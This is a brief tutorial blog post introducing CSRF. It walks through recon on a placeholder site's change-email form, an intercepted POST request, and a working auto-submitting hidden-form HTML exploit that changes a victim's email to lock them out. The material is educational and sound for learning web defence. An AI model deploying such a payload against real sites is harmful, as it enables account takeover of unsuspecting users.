An Introduction to CSRF Attacks

 - 2 min read

Situation

We have a web application that’s vulnerable to CSRF attacks. What we want to do is to create a malicious HTML snippet. This page if accessed by an arbitrary user should auto-submit on their behalf, using their own credentials (cookies).

More specifically, the goal is to change a user’s email, and lock them out of the site.

Recon

We want to target the “Change Email” form, so let’s do some recon first by logging into our account to check things out.

After logging in, we can see the “Change Email” page on https://target-site.com/email/change-email. The specific form looks like this:

HTTP/1.1 200 OK
...
Content-Length: 3069

<!DOCTYPE html>
<html>
...
    <form class="login-form" action="/email/change-email" method="POST">
        <label>Email</label>
        <input required type="email" name="email" value="">
        <button class='button' type='submit'> Update email </button>
    </form>
...

Let’s submit this form with our account, then intercept it to see what’s inside:

POST /email/change-email HTTP/1.1Host: target-host.com
...
Cookie: session=4TPtiDWqNK0xcLA3anvevopNojTU5zTe
email=hello%40mail.com

We can see that it’s vulnerable to CSRF attacks because:

  1. There is a specific action POST /email/change-email
  2. It’s a cookie based request
  3. The request parameters are predictable, in this case it’s just email

Exploit

Now that we have all the pieces, let’s craft the exploit. We want to write a similar form that has hidden inputs, and that auto-submits, like this one:

<html>
  <body>
    <form action="https://target-host.com/email/change-email" method="POST">      <input type="hidden" name="email" value="your_new_email@mail.com" />    </form>
    <script>
      document.forms[0].submit();    </script>
  </body>
</html> 

That’s it! We can verify that it does the job by going to the page ourselves and checking the new email your_new_email@mail.com.